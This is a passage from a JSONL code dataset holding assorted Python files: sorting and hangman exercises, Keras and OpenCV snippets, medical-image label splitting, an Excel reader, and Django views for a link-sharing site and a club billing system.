arr[j] = arr[j], arr[i]\n arr[i+1], arr[hi] = arr[hi], arr[i+1]\n return i + 1\n\narr = [1, 2, 7, 5, 6, 12, 5, 7, 32, 87, 1, 2, 5]\n\nprint(quicksort(arr))\nprint(quicksort_2(arr, 0, 12))\nprint(arr)","sub_path":"Quicksort.py","file_name":"Quicksort.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"559312882","text":"def jogar():\n print(\"*********************************\")\n print(\"***Bem vindo ao jogo da Forca!***\")\n print(\"*********************************\")\n\n palavra_secreta = \"python\".upper()\n letras_acertadas = [\"_\", \"_\", \"_\", \"_\", \"_\", \"_\"]\n erros = 0\n\n enforcou = False\n acertou = False\n\n print(letras_acertadas)\n\n while(not enforcou and not acertou):\n\n chute = input(\"Qual letra? \")\n chute = chute.strip()\n\n if(chute in palavra_secreta):\n index = 0\n for letra in palavra_secreta:\n if(chute.upper() == letra):\n letras_acertadas[index] = letra\n index += 1\n else:\n erros += 1\n\n enforcou = erros == 6\n acertou = \"_\" not in letras_acertadas #nao acertou\n print(letras_acertadas)\n\n if(acertou):\n print(\"Voce ganhou!\")\n else:\n print(\"Voce perdeu!!\")\n print(\"Fim do jogo\")\n\nif(__name__ == \"__main__\"):\n jogar()","sub_path":"Intro/jogos/escolher_jogo/jogo_forca.py","file_name":"jogo_forca.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"563283474","text":"import keras\nfrom keras.layers import *\nfrom keras_self_attention import SeqSelfAttention\n# https://pypi.org/project/keras-self-attention/\n# pip install keras-self-attention\n\ndef classifier_att(alpha_cb, optimizer='adam',dropout=0.5):\n model = keras.models.Sequential()\n #model.add(keras.layers.LSTM(units=hidden_size, input_shape=(time_steps,feature_num), return_sequences=True))\n #model.add(keras.layers.Bidirectional(keras.layers.LSTM(units=hidden_size,return_sequences=True)))\n model.add(keras.layers.Bidirectional(keras.layers.LSTM(units=hidden_size,return_sequences=True),input_shape=(time_steps,feature_num)))\n model.add(SeqSelfAttention(attention_activation='sigmoid'))\n model.add(keras.layers.LSTM(units=hidden_size,return_sequences=True))\n model.add(Dropout(dropout))\n model.add(TimeDistributed(Dense(int(hidden_size/2), activation=mish)))\n model.add(Flatten())\n model.add(Dense(y_dim)) # Dense layer has y_dim=1 or 2 neuron.\n model.add(Activation('softmax'))\n\n #model.compile(loss=wrapped_loss(alpha_cb), optimizer=optimizer, metrics=[f1_score])\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=[f1_score])\n return model\n","sub_path":"classifier_att_snippet.py","file_name":"classifier_att_snippet.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"82212423","text":"import os\n\nimport nibabel as nib\nimport numpy as np\n\nroot_dir = \"./data\"\n\nsrc_label = os.path.join(root_dir, \"RawData/Training/label\")\n\ndst_Spleen = os.path.join(root_dir, \"btcv_spleen/labelsTr\")\n\nos.makedirs(os.path.join(root_dir, \"btcv_spleen\"), exist_ok=True)\nos.makedirs(dst_Spleen, exist_ok=True)\n\nfor path, subdirs, files in os.walk(src_label):\n for file in files:\n label_file = os.path.join(src_label, file)\n label = nib.load(label_file)\n label = nib.funcs.as_closest_canonical(label, enforce_diag=False)\n affine = label.affine\n label = np.array(label.dataobj)\n label = label.astype(np.float32)\n label[label == 5] = 0\n label[label == 6] = 5\n label[label == 11] = 6\n label[label > 6] = 0\n print(\"file: \", file)\n # 1-spleen, 2-right kidney, 3-left kidney, 4-Gallbladder, 5-liver, 6-Pancreas\n print(\"label-0: \", (label == 0).sum())\n print(\"label-1: \", (label == 1).sum())\n print(\"label-2: \", (label == 2).sum())\n print(\"label-3: \", (label == 3).sum())\n print(\"label-4: \", (label == 4).sum())\n print(\"label-5: \", (label == 5).sum())\n print(\"label-6: \", (label == 6).sum())\n print(\"label-7: \", (label == 7).sum())\n print(\"label-8: \", (label == 8).sum())\n print(\"label-9: \", (label == 9).sum())\n\n mask = label.copy()\n mask[mask != 1] = 0\n if (mask == 1).sum() != 0:\n nib.save(\n nib.Nifti1Image(mask, affine),\n os.path.join(dst_Spleen, file),\n )\n","sub_path":"model_zoo/adapt_bundle_to_another_dataset/split_spleen_labels.py","file_name":"split_spleen_labels.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"30839906","text":"import xlrd\n\n\n# ----------------------------------------------------------------------\ndef open_file(path):\n \"\"\"\n Open and read an Excel file\n \"\"\"\n book = xlrd.open_workbook(path)\n\n # print number of sheets\n print\n book.nsheets\n\n # print sheet names\n print\n book.sheet_names()\n\n # get the first worksheet\n first_sheet = book.sheet_by_index(0)\n\n # read a row\n print\n first_sheet.row_values(0)\n\n # read a cell\n cell = first_sheet.cell(0, 0)\n print\n cell\n print\n cell.value\n\n # read a row slice\n print\n first_sheet.row_slice(rowx=0,\n start_colx=0,\n end_colx=2)\n\n\n\n\ndef loadFile(fileName):\n open_file(fileName)\n\n\ndef main():\n fileName = \"inbox/7872_Transactions_30_05_2018.xls\"\n loadFile(fileName)\n\nmain()","sub_path":"src/discarded/xlsParser.py","file_name":"xlsParser.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"370121452","text":"from django.contrib.auth import logout\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.views.generic import TemplateView\nfrom django.views.generic import ListView\n\nfrom itertools import chain\n\nfrom users.models import User\nfrom links.models import Link, LinkManager\nfrom reposts.models import Repost\nfrom notifications.models import Notification\n\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/')\n\nclass WelcomeView(TemplateView):\n template_name = \"index.html\"\n\nclass HomeView(ListView):\n model = Link\n template_name = \"home.html\"\n context_object_name = 'post_list'\n \n def get_queryset(self):\n if self.request.user.is_anonymous():\n queryset = sorted(chain(Link.objects.all(),Repost.objects.all()), key=lambda instance: instance.created_at, reverse=True)\n else:\n following = self.request.user.following.all()\n if following is None:\n queryset = sorted(chain(Link.objects.all(),Repost.objects.all()), key=lambda instance: instance.created_at, reverse=True)\n else:\n queryset = chain()\n for user in following:\n queryset = chain(queryset,user.links.all(),user.reposts.all())\n return sorted(queryset, key=lambda instance: instance.created_at, reverse=True)\n\n def get_context_data(self, **kwargs):\n context = super(HomeView, self).get_context_data(**kwargs)\n return context\n\n def render_to_response(self, context):\n if bool(self.request.GET):\n\n if (\"link-repost-button\" in self.request.GET.keys()[0]):\n link_id = int(self.request.GET.keys()[0][19:])\n if not self.request.user.is_anonymous():\n link = Link.objects.get(pk=link_id)\n link.hotness = link.hotness + 1\n link.save()\n Repost.objects.create_repost(link, self.request.user)\n\n repost_notification = Notification.objects.create_notification('reposted', link.posted_by, self.request.user)\n repost_notification.save()\n\n\n if (\"repost-repost-button\" in self.request.GET.keys()[0]):\n repost_id = int(self.request.GET.keys()[0][21:])\n if not self.request.user.is_anonymous():\n repost = Repost.objects.get(pk=repost_id)\n repost.original.hotness = repost.original.hotness + 1\n repost.original.save()\n Repost.objects.create_repost(repost.original, self.request.user, repost)\n\n repost_notification = Notification.objects.create_notification('reposted', repost.original.posted_by, self.request.user)\n repost_notification.save()\n\n \n return super(HomeView, self).render_to_response(context)\n","sub_path":"line/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"649919236","text":"\"\"\"\nUtils for berp\n\"\"\"\n\nimport re\nimport string\nfrom datetime import date\n\nfrom dateutil.parser import parse as dateutil_parse\n\n\ndef clean_company_name(name):\n \"\"\"\n Args:\n name (str): company name\n\n Return:\n (str): company name with only alphanumeric characters\n \"\"\"\n return ''.join(c.lower() for c in company_search_name(name) if c.isalnum())\n\n\ndef company_search_name(name):\n \"\"\"\n Args:\n name (str): company name\n\n Return:\n (str): company name extras that would mess up a search removed,\n for example punctuation or \"inc\" or \"plc\"\n \"\"\"\n exclude = set(string.punctuation)\n name = ''.join(ch for ch in name if ch not in exclude)\n return re.sub(r'(inc|plc|corp|ltd|shs)$', '', name, flags=re.IGNORECASE).strip()\n\n\ndef get_date(date_string):\n \"\"\"\n Extracts the date from a potentially fuzzy date string\n\n Args:\n date_string (str): fuzzy date string\n\n Returns:\n Date if exists\n None if does not exist\n \"\"\"\n d = dateutil_parse(date_string,\n fuzzy=True,\n default=date(year=1900, month=1, day=1))\n if d != date(1900, 1, 1):\n return d\n else:\n return None","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"612937366","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 7 17:28:35 2020\r\n\r\n@author: Romain\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef empty(a):\r\n pass\r\n\r\n \r\ndef stackImages(scale,imgArray):\r\n rows = len(imgArray)\r\n cols = len(imgArray[0])\r\n rowsAvailable = isinstance(imgArray[0], list)\r\n width = imgArray[0][0].shape[1]\r\n height = imgArray[0][0].shape[0]\r\n if rowsAvailable:\r\n for x in range ( 0, rows):\r\n for y in range(0, cols):\r\n if imgArray[x][y].shape[:2] == imgArray[0][0].shape [:2]:\r\n imgArray[x][y] = cv2.resize(imgArray[x][y], (0, 0), None, scale, scale)\r\n else:\r\n imgArray[x][y] = cv2.resize(imgArray[x][y], (imgArray[0][0].shape[1], imgArray[0][0].shape[0]), None, scale, scale)\r\n if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR)\r\n imageBlank = np.zeros((height, width, 3), np.uint8)\r\n hor = [imageBlank]*rows\r\n hor_con = [imageBlank]*rows\r\n for x in range(0, rows):\r\n hor[x] = np.hstack(imgArray[x])\r\n ver = np.vstack(hor)\r\n else:\r\n for x in range(0, rows):\r\n if imgArray[x].shape[:2] == imgArray[0].shape[:2]:\r\n imgArray[x] = cv2.resize(imgArray[x], (0, 0), None, scale, scale)\r\n else:\r\n imgArray[x] = cv2.resize(imgArray[x], (imgArray[0].shape[1], imgArray[0].shape[0]), None,scale, scale)\r\n if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR)\r\n hor= np.hstack(imgArray)\r\n ver = hor\r\n return ver\r\n\r\n\r\n################################## Face Detection\r\n\r\n\r\nfaceCascade = cv2.CascadeClassifier(\"cascades/haarcascade_frontalface_default.xml\")\r\nimg = cv2.imread(\"nini.JPG\")\r\nimgResize = cv2.resize(img,(400,300))\r\nimgGray = cv2.cvtColor(imgResize, cv2.COLOR_BGR2GRAY)\r\n\r\n\r\nfaces = faceCascade.detectMultiScale(imgGray, 1.1, 4)\r\n\r\nfor (x,y,w,h) in faces:\r\n cv2.rectangle(imgResize,(x,y),(x+w, y+h), (255,0,0), 2)\r\n \r\n\r\n \r\ncv2.imshow(\"face\", imgResize)\r\ncv2.waitKey(0)\r\n\r\n\"\"\"\r\n################################## Color Detection\r\n\r\ncv2.namedWindow(\"TrackBars\")\r\ncv2.resizeWindow(\"TrackBars\", 640, 240)\r\ncv2.createTrackbar(\"Hue min\", \"TrackBars\",0,179,empty)\r\ncv2.createTrackbar(\"Hue max\", \"TrackBars\",179,179,empty)\r\ncv2.createTrackbar(\"Sat min\", \"TrackBars\",0,255,empty)\r\ncv2.createTrackbar(\"Sat max\", \"TrackBars\",255,255,empty)\r\ncv2.createTrackbar(\"Val min\", \"TrackBars\",0,255,empty)\r\ncv2.createTrackbar(\"Val max\", \"TrackBars\",255,255,empty)\r\n\r\nwhile True:\r\n img = cv2.imread(\"nini.JPG\")\r\n\r\n imgResize = cv2.resize(img,(400,300)) #OpenCV : Width first, then high\r\n imgHSV = cv2.cvtColor(imgResize, cv2.COLOR_BGR2HSV)\r\n\r\n h_min = cv2.getTrackbarPos(\"Hue min\", \"TrackBars\")\r\n h_max = cv2.getTrackbarPos(\"Hue max\", \"TrackBars\")\r\n s_min = cv2.getTrackbarPos(\"Sat min\", \"TrackBars\")\r\n s_max = cv2.getTrackbarPos(\"Sat max\", \"TrackBars\")\r\n v_min = cv2.getTrackbarPos(\"Val min\", \"TrackBars\")\r\n v_max = cv2.getTrackbarPos(\"Val max\", \"TrackBars\")\r\n\r\n print(h_min, h_max, s_min, s_max, v_min, v_max)\r\n lower = np.array([h_min, s_min, v_min])\r\n upper = np.array([h_max, s_max, v_max])\r\n mask = cv2.inRange(imgHSV, lower, upper) \r\n imgResult = cv2.bitwise_and(imgResize,imgResize,mask=mask)\r\n \r\n \r\n\r\n # cv2.imshow(\"Original\", imgResize)\r\n # cv2.imshow(\"HSV\", imgHSV)\r\n # cv2.imshow(\"mask\", mask)\r\n # cv2.imshow(\"Results\", imgResult)\r\n \r\n imgStack = stackImages(0.2, ([img,imgHSV],[mask,imgResult]))\r\n cv2.imshow(\"stacked Images\", imgStack)\r\n \r\n cv2.waitKey(1)\r\n\r\n\"\"\"\r\n \r\n \r\n\"\"\"\r\n################################## Redressage d'image\r\nimg = cv2.imread(\"Redresse.jpg\")\r\nimgResize = cv2.resize(img,(400,700)) #OpenCV : Width first, then high\r\nwidth, height = 400, 700\r\npts1 = np.float32([[179,619], [763,561],[253,1401],[1030,1260]])\r\npts2 = np.float32([[0,0], [width, 0], [0,height], [width,height]])\r\nmatrix = cv2.getPerspectiveTransform(pts1,pts2)\r\nimgOutPut = cv2.warpPerspective(img, matrix, (width, height))\r\n\r\ncv2.imshow(\"Image\", imgResize)\r\ncv2.imshow(\"Feuille\", imgOutPut)\r\n\r\n\r\ncv2.waitKey(0)\r\n\"\"\"\r\n\r\n\"\"\"\r\n################################## Shapes and texts\r\n\r\nimg = np.zeros((512,512,3),np.uint8)\r\n\r\n#img[200:300,200:300] = 135,45,56\r\ncv2.line(img,(0,0),(200,300),(0,0,255),4) #(img,startPt, EndPt, Color, Thickness)\r\ncv2.rectangle(img,(0,0),(200,300),(0,255,0),6) # the same\r\ncv2.circle(img,(300,150), (100),(255,0,0),8) # (img, centerPt, radius, color, thickness)\r\ncv2.putText(img, \"Coucou\", (0,400), cv2.FONT_HERSHEY_COMPLEX, 4, (20,130,200),2) #(img, text, centerPt, Font, Scale, Color, thickness)\r\n\r\ncv2.imshow(\"Image\", img)\r\n\r\n\r\ncv2.waitKey(0)\r\n\"\"\"\r\n\r\n\"\"\"\r\n################################## Image modifications\r\nimg = cv2.imread(\"nini.JPG\")\r\nkernel = np.ones((11,11),np.uint8)\r\nprint(img.shape)\r\nimgResize = cv2.resize(img,(400,300)) #OpenCV : Width first, then high\r\nimgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nimgGrayBlur = cv2.GaussianBlur(imgGray, (7,7),50)\r\nimgBlur = cv2.GaussianBlur(img, (51,51), 0)\r\nimgCanny = cv2.Canny(img, 20, 20)\r\nimgDialation = cv2.dilate(imgCanny, kernel, iterations=1)\r\nimgCropped = img[0:150,50:250] #Not OpenCV so first high and then width\r\ncv2.imshow(\"Gray Image\", imgGray)\r\n\"\"\"\r\n\r\n\"\"\"\r\n################################## Camera video capture\r\ncap = cv2.VideoCapture(0)\r\n\r\ncap.set(3,640)\r\ncap.set(4,480)\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n cv2.imshow(\"Video\",img)\r\n if cv2.waitKey(1) & 0xFF ==ord('q'):\r\n break\r\n \r\n\"\"\"\r\n","sub_path":"Chapter1.py","file_name":"Chapter1.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"454740641","text":"# import random\n# pool=list(range(1,71))\n# random.sample(pool, 5)\n\n# import os\n# print(os.getcwd())\n\n# fout = open('output.txt', 'a')\n\n# line1 = \"How many roads must a man walk down\\n\"\n# fout.write(line1)\n\n# line2 = \"Before you call him a man?\\n\"\n# fout.write(line2)\n# fout.close()\n\n# print(os.path.abspath('session12/output.txt'))\n# print(os.path.exists('session14/input.txt'))\n\n# import pickle\n# t = [1, 2, 3]\n\n# f = open('save.p', 'wb')\n# s = pickle.dump(t, f)\n# f.close()\n\n\n# t2 = pickle.load(open('save.p', 'rb'))\n# print(t2)\n\n\ndef linecount(filename):\n count = 0\n for line in open(filename):\n count += 1\n return count\n\nprint(linecount('wc.py'))\n\nif __name__ == '__main__':\n print(linecount('wc.py'))","sub_path":"session14/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"548160855","text":"from datetime import datetime\nimport logging\nfrom braces.views import StaffuserRequiredMixin\nfrom django.db.models import Sum, Count, Q\nfrom django.http import JsonResponse\nfrom django.shortcuts import redirect\nfrom django.contrib import messages\nfrom django.views.generic import TemplateView, FormView\nfrom mysite.common import Button\nfrom members.forms import BillingForm, SettingsForm, PosAnalysisForm\nfrom members.models import Settings, ItemType, Invoice, InvoiceItem, Subscription, Fees\nfrom pos.models import PosPayment, VisitorBook, Transaction\nfrom events.models import Event\nfrom members.tasks import (\n schedule_item_billing,\n schedule_invoice_creation,\n schedule_mail_task,\n)\nfrom members.views.invoice_views import create_invoice_payment_task\nfrom members.mail import create_draft_invoice_mail_task, preview_mail_task_json\nfrom members.services import subscription_renew_all\nfrom pos.services import export_pos\n\nstdlogger = logging.getLogger(__name__)\n\n\nclass SetYearView(StaffuserRequiredMixin, FormView):\n \"\"\"\n Change membership year in Setting File\n \"\"\"\n\n form_class = SettingsForm\n template_name = \"members/crispy_tile.html\"\n title = \"Set membership year\"\n\n def get_initial(self):\n initial = super().get_initial()\n initial[\"membership_year\"] = Settings.current_year()\n return initial\n\n def form_valid(self, form):\n Settings.set_current_year(form.cleaned_data[\"membership_year\"])\n return redirect(\"home\")\n\n\nclass YearEndView(StaffuserRequiredMixin, TemplateView):\n template_name = \"members/year_end.html\"\n title = \"Year end\"\n\n def get(self, request, *args, **kwargs):\n self.year = Settings.current_year()\n if datetime.now().year != self.year:\n messages.warning(\n request, f\"Please change the membership year before running year end\"\n )\n return redirect(\"billing-set-year\")\n if not Fees.objects.filter(sub_year=self.year).exists():\n messages.warning(\n request, f\"Please set fees for {self.year} before running year end\"\n )\n return redirect(\"fees-list\")\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"expired\"] = Subscription.objects.expired(self.year).count()\n context[\"new_year\"] = self.year\n context[\"old_year\"] = self.year - 1\n return context\n\n def post(self, request):\n self.year = Settings.current_year()\n if \"renew\" in request.POST:\n count = subscription_renew_all(self.year, Subscription.START_MONTH)\n messages.info(request, f\"{count} subs were renewed\")\n return redirect(\"billing-period\")\n\n\nclass BillingView(StaffuserRequiredMixin, FormView):\n \"\"\"\n Year end requires that the year has been changed and the fees set\n \"\"\"\n\n template_name = \"members/billing.html\"\n form_class = BillingForm\n year = 0\n mailed = 0\n title = \"Period end\"\n mail_task = None\n\n def get_initial(self):\n self.year = Settings.current_year()\n self.from_date = datetime(self.year, Subscription.START_MONTH, 1).date()\n self.to_date = datetime.now().date()\n if self.to_date < self.from_date:\n self.to_date = self.from_date\n self.minimum_amount = 0\n self.invoice_date = datetime.now().date()\n self.invoice_from_date = datetime.now().date()\n self.invoice_to_date = datetime.now().date()\n self.mailed = 0\n initial = {\n \"from_date\": self.from_date,\n \"to_date\": self.to_date,\n \"minimum_amount\": self.minimum_amount,\n \"invoice_date\": self.invoice_date,\n \"invoice_from_date\": self.invoice_from_date,\n \"invoice_to_date\": self.invoice_to_date,\n \"mailed\": self.mailed,\n }\n return initial\n\n def get_invoice_queryset(self):\n invoices = Invoice.objects.filter(\n date__range=[self.invoice_from_date, self.invoice_to_date],\n state=Invoice.STATE.UNPAID,\n payment_task__isnull=True,\n ).order_by(\"person__first_name\")\n if self.mailed == 0:\n return invoices.filter(email_count=0)\n elif self.mailed == 1:\n return invoices.filter(email_count__gt=0)\n else:\n return invoices\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"year\"] = self.year\n bar = PosPayment.billing.unbilled_total(\n item_type_id=ItemType.BAR, from_date=self.from_date, to_date=self.to_date\n )\n teas = PosPayment.billing.unbilled_total(\n item_type_id=ItemType.TEAS, from_date=self.from_date, to_date=self.to_date\n )\n visitors = VisitorBook.billing.unbilled_total(\n from_date=self.from_date, to_date=self.to_date\n )\n tournaments = Event.billing.unbilled_total(item_type_id=ItemType.TOURNAMENT)\n events = Event.billing.unbilled_total(item_type_id=ItemType.SOCIAL)\n\n total = bar + teas + visitors + tournaments + events\n context[\"pos_bar\"] = bar\n context[\"pos_teas\"] = teas\n context[\"pos_visitors\"] = visitors\n context[\"tournaments\"] = tournaments\n context[\"events\"] = events\n context[\"total\"] = total\n qs = (\n InvoiceItem.objects.filter(invoice=None)\n .values(\"item_type_id\", \"item_type__description\")\n .annotate(total=Sum(\"amount\"))\n )\n query = \"?invoiced=0&item_type=\"\n context[\"items\"] = [\n [\n record[\"item_type__description\"],\n record[\"total\"],\n query + str(record[\"item_type_id\"]),\n ]\n for record in qs\n ]\n context[\"item_total\"] = sum([record[\"total\"] for record in qs])\n invoices = self.get_invoice_queryset()\n count = invoices.count()\n value = 0 if count == 0 else invoices.aggregate(value=Sum(\"total\"))[\"value\"]\n context[\"invoice_count\"] = count\n context[\"invoice_value\"] = value\n return context\n\n def post(self, request, *args, **kwargs):\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n if form.is_valid():\n self.year = Settings.current_year()\n self.from_date = form.cleaned_data.get(\"from_date\", None)\n self.to_date = form.cleaned_data.get(\"to_date\", None)\n self.invoice_from_date = form.cleaned_data.get(\"invoice_from_date\", None)\n self.invoice_to_date = form.cleaned_data.get(\"invoice_to_date\", None)\n self.mailed = int(form.cleaned_data.get(\"mailed\", 0))\n text_block = form.cleaned_data.get(\"template\", None)\n id_list = list(self.get_invoice_queryset().values_list(\"id\", flat=True))\n mail_task = None\n if text_block:\n mail_task = create_draft_invoice_mail_task(request, id_list, text_block)\n else:\n return self.render_to_response(self.get_context_data(form=form))\n\n if \"filter\" in request.POST or \"invoice-filter\" in request.POST:\n return self.render_to_response(self.get_context_data(form=form))\n\n if \"send\" in request.POST:\n if mail_task:\n mail_task.save()\n schedule_mail_task(mail_task.id)\n create_invoice_payment_task(id_list)\n messages.info(\n request, f\"{len(id_list)} mails sent and payments scheduled\"\n )\n else:\n messages.error(request, f\"No email template selected\")\n return self.render_to_response(self.get_context_data(form=form))\n\n if request.is_ajax():\n command = form.cleaned_data.get(\"command\", None)\n if command in [\"bar\", \"teas\", \"visitors\", \"events\", \"tournaments\", \"all\"]:\n Settings.set_task_busy(True)\n schedule_item_billing(\n from_date=self.from_date, to_date=self.to_date, command=command\n )\n return JsonResponse({})\n\n elif command == \"create-invoices\":\n schedule_invoice_creation(\n form.cleaned_data[\"minimum_amount\"],\n form.cleaned_data[\"invoice_date\"],\n commit=True,\n )\n return JsonResponse({})\n\n # It's a preview\n index = form.cleaned_data.get(\"index\", None)\n return preview_mail_task_json(mail_task, index)\n return redirect(\"billing-period\")\n\n # elif 'consolidate' in request.POST:\n # counts = consolidate(year)\n # message = '{} people processed, {} unpaid and {} credit notes carried forward'.format(\n # counts[0], counts[1], counts[2])\n # messages.success(self.request, message)\n # return redirect('year-end')\n\n # elif 'renew' in request.POST:\n #\n # #count = subscription_renew_batch(year, Subscription.START_MONTH)\n # message = '{} subscriptions generated'.format(count)\n # messages.success(self.request, message)\n # return redirect('billing')\n #\n\n return redirect(\"billing-period\")\n\n\nclass FinanceAnalysisView(StaffuserRequiredMixin, FormView):\n template_name = \"members/financial_analysis.html\"\n form_class = PosAnalysisForm\n title = \"Financial analysis\"\n from_date = None\n to_date = None\n\n def __init__(self):\n year = Settings.current_year()\n self.from_date = datetime(year, Subscription.START_MONTH, 1).date()\n self.to_date = datetime.now().date()\n super().__init__()\n\n def get_initial(self):\n return {\"from_date\": self.from_date, \"to_date\": self.to_date}\n\n def all_transactions(self):\n return Transaction.subset.query(from_date=self.from_date, to_date=self.to_date)\n\n def bar_transactions(self):\n return self.all_transactions().filter(item_type_id=ItemType.BAR)\n\n def teas_transactions(self):\n return self.all_transactions().filter(item_type_id=ItemType.TEAS)\n\n def all_payments(self):\n return PosPayment.objects.filter(\n transaction__creation_date__date__range=[self.from_date, self.to_date]\n )\n\n def bar_payments(self):\n return self.all_payments().filter(transaction__item_type_id=ItemType.BAR)\n\n def teas_payments(self):\n return self.all_payments().filter(transaction__item_type_id=ItemType.TEAS)\n\n def visitors(self):\n return VisitorBook.objects.filter(date__range=[self.from_date, self.to_date])\n\n def items(self):\n return InvoiceItem.objects.filter(\n creation_date__range=[self.from_date, self.to_date]\n )\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"buttons\"] = [Button(\"Filter\"), Button(\"Export\")]\n context[\"bar_accounts\"] = zero(\n self.bar_transactions()\n .filter(person_id__isnull=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_billed\"] = zero(\n self.bar_payments()\n .filter(transaction__person_id__isnull=False, billed=True)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_unbilled\"] = zero(\n self.bar_payments()\n .filter(transaction__person_id__isnull=False, billed=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_cash\"] = zero(\n self.bar_transactions()\n .filter(cash=True)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_comp\"] = zero(\n self.bar_transactions()\n .filter(complimentary=True)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_unattr\"] = zero(\n self.bar_transactions()\n .filter(person_id__isnull=True, cash=False, complimentary=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_total\"] = zero(\n self.bar_transactions().aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n\n context[\"teas_accounts\"] = zero(\n self.teas_payments()\n .filter(transaction__person_id__isnull=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"teas_unbilled\"] = zero(\n self.teas_payments()\n .filter(transaction__person_id__isnull=False, billed=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"teas_billed\"] = zero(\n self.teas_payments()\n .filter(transaction__person_id__isnull=False, billed=True)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"visitors\"] = zero(self.visitors().aggregate(Sum(\"fee\"))[\"fee__sum\"])\n context[\"visitors_unbilled\"] = zero(\n self.visitors().filter(billed=False).aggregate(Sum(\"fee\"))[\"fee__sum\"]\n )\n context[\"visitors_billed\"] = zero(\n self.visitors().filter(billed=True).aggregate(Sum(\"fee\"))[\"fee__sum\"]\n )\n\n context[\"items\"] = (\n self.items()\n .values(\"item_type__description\")\n .annotate(\n sum=Sum(\"amount\", filter=Q(invoice_id__isnull=False)),\n count=Count(\n \"item_type_id\", filter=Q(paid=True, invoice_id__isnull=False)\n ),\n unpaid_sum=Sum(\n \"amount\", filter=Q(paid=False, invoice_id__isnull=False)\n ),\n unpaid_count=Count(\n \"item_type_id\", filter=Q(paid=False, invoice_id__isnull=False)\n ),\n unbilled_sum=Sum(\"amount\", filter=Q(invoice_id__isnull=True)),\n unbilled_count=Count(\"item_type_id\", filter=Q(invoice_id__isnull=True)),\n )\n .order_by(\"item_type_id\")\n )\n\n context[\"items_total\"] = self.items().aggregate(\n sum=Sum(\"amount\", filter=Q(paid=True, invoice_id__isnull=False)),\n count=Count(\"item_type_id\", filter=Q(paid=True, invoice_id__isnull=False)),\n unpaid_sum=Sum(\"amount\", filter=Q(paid=False, invoice_id__isnull=False)),\n unpaid_count=Count(\n \"item_type_id\", filter=Q(paid=False, invoice_id__isnull=False)\n ),\n unbilled_sum=Sum(\"amount\", filter=Q(invoice_id__isnull=True)),\n unbilled_count=Count(\"item_type_id\", filter=Q(invoice_id__isnull=True)),\n )\n\n context[\"subs_detail\"] = (\n self.items()\n .filter(item_type_id=ItemType.SUBSCRIPTION)\n .values(\"subscription__membership__description\")\n .annotate(\n sum=Sum(\"amount\", filter=Q(paid=True)),\n count=Count(\"item_type_id\", filter=Q(paid=True)),\n unpaid_sum=Sum(\"amount\", filter=Q(paid=False)),\n unpaid_count=Count(\"item_type_id\", filter=Q(paid=False)),\n unbilled_sum=Sum(\"amount\", filter=Q(invoice_id__isnull=True)),\n unbilled_count=Count(\"item_type_id\", filter=Q(invoice_id__isnull=True)),\n )\n .order_by(\"subscription__membership_id\")\n )\n\n context[\"subs_total\"] = (\n self.items()\n .filter(item_type_id=ItemType.SUBSCRIPTION)\n .aggregate(\n sum=Sum(\"amount\", filter=Q(paid=True)),\n count=Count(\"item_type_id\", filter=Q(paid=True)),\n unpaid_sum=Sum(\"amount\", filter=Q(paid=False)),\n unpaid_count=Count(\"item_type_id\", filter=Q(paid=False)),\n unbilled_sum=Sum(\"amount\", filter=Q(invoice_id__isnull=True)),\n unbilled_count=Count(\"item_type_id\", filter=Q(invoice_id__isnull=True)),\n )\n )\n\n context[\"tournaments\"] = Event.billing.unbilled_total(\n item_type_id=ItemType.TOURNAMENT\n )\n context[\"social\"] = 